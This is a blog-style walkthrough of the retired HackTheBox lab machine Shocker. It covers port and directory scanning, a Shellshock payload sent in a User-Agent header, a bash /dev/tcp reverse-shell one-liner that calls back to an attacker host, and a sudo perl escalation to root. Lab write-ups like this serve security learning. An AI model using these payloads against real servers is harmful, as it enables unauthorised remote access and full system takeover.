[Write-up] Shocker Machine on HackTheBox

Hi everybody,

Today, I will tell about Shocker machine which is retired HTB machine. Even if difficulty seems easy but it forced me. I got help where I could not progress from others write-up. Before I start, the aim of this machine is Shellshock Vulnerability. You can more information in here.

As you know, We started port scanning with nmap tool as per usual other blog posts. After this, I use nmapAutomator insted of nmap. It is very helpful. Thanks 21y4d

Let’s start with nmapAutomator :)

Port Scanning

nmapAutomator.sh <MACHINE-IP> Full

Just two ports openning. 80 (http - Apache 2.4.18) and 2222 (ssh - OpenSSH 7.2p2)


When we go to the web site, a funny web page welcome us. The page have only a image, not contains any important information. Also, I examined image with exiftool, but I could not find any information too.


The next is directory scanning :)

Gobuster Directory Scanning

gobuster dir -w <WORD-LIST> -u <MACHINE-IP> -f -t 40

I lost a lot of time in here. Although It seems easy, goubster has -f option that means dir mode only. To be honest, I have never used it and did not think. Gobuster found /cgi-bin/ directory. Exactly, the story begins in here :)

What is /cgi-bin/ ?

In computing, Common Gateway Interface (CGI) is an interface specification for web servers to execute programs like console applications (also called command-line interface programs) running on a server that generates web pages dynamically. (from wikipedia)

So, I did the second sh and cgi files search in /cgi-bin/ with gobuster.

gobuster dir -w <WORD-LIST> -u <MACHINE-IP> -t 40 -x cgi,sh


There was user.sh file in /cgi-bin/ directory. When we send request to user.sh file, the script file executing uptime.


I tried Shellshock vulnerable in here and used bash () { :; }; echo; /bin/ls this payload on User-Agent header.


Reverse Shell and Getting User Flag

I used following payload for getting reverse shell. Furthermore, You can find info in here After getting reverse shell, I got user flag.

() { ignored;};/bin/bash -i >& /dev/tcp/<MACHINE-IP>/<PORT> 0>&1


Privilege Escalation - Root Flag

After catching user flag, I examined following things for privilege excalation in system.

  • Crontab
  • SUID files
  • sudo -l command


shelly user uses sudo to run perl. Of course, First thing come to mind, go to GTFOBins. Run following command for being root user.

sudo perl -e 'exec "/bin/sh";'


That’s all. See you next blog post :)